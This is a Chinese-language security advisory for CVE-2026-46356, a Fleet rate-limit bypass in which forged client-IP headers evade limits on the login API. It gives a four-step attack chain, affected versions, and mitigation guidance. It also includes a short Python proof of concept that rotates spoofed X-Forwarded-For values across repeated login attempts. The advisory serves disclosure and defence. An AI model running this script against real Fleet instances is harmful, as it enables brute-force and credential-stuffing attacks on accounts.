CVE-2026-46356 CVSS 7.5 高危

CVE-2026-46356 Fleet IP提取逻辑漏洞致速率限制绕过

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-46356

漏洞类型

速率限制绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet是开源设备管理软件。在4.80.1版本之前，其IP提取逻辑存在漏洞，允许未经身份验证的攻击者通过伪造客户端IP头部来绕过API速率限制。攻击者可利用此漏洞对暴露在互联网上的Fleet实例进行暴力破解登录或其他滥用行为。该问题主要影响直接暴露在互联网且未配置反向代理的实例。

技术细节

Fleet在处理客户端IP地址时，直接从请求头（如True-Client-IP、X-Real-IP、X-Forwarded-For）中提取值，而未验证这些头部是否源自受信任的代理。提取出的IP被用作速率限制和IP封禁决策的依据。由于缺乏验证，攻击者可以在每次请求中轮换这些头部的值，导致Fleet将每次尝试视为来自不同的客户端。这实际上绕过了针对登录API等敏感端点的基于IP的速率限制，从而实现了无限制的暴力破解或凭据填充攻击。此漏洞主要影响直接暴露在互联网上的实例，若实例后端有正确配置的代理或WAF覆盖头部，则受影响较小。

攻击链分析

STEP 1

侦察

攻击者识别出暴露在互联网上的Fleet实例及其登录API端点。

STEP 2

伪造请求

攻击者构造HTTP请求，在头部中注入伪造的X-Forwarded-For或X-Real-IP值。

STEP 3

速率限制绕过

Fleet服务器根据伪造的头部提取IP，判定每次请求来自不同客户端，从而不触发速率限制。

STEP 4

暴力攻击

攻击者利用绕过机制，进行高频的暴力破解或凭据填充攻击，尝试获取账户访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL url = "https://target-fleet-instance.com/api/v1/login" # Iterate through requests spoofing different IPs for i in range(10): # Spoof X-Forwarded-For header to bypass rate limiting headers = { "User-Agent": "Mozilla/5.0", "X-Forwarded-For": f"1.2.3.{i}" } # Attempt login (example payload) data = { "email": "[email protected]", "password": "password123" } try: response = requests.post(url, headers=headers, json=data, timeout=5) print(f"Attempt {i}: Status Code {response.status_code}, IP: 1.2.3.{i}") except Exception as e: print(f"Error: {e}")

影响范围

Fleet < 4.80.1

防御指南

临时缓解措施

如果无法立即升级，管理员应确保Fleet部署在反向代理（如nginx、Cloudflare、AWS ALB）之后，该代理会用真实客户端IP覆盖X-Forwarded-For头部，并在代理或WAF层应用速率限制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表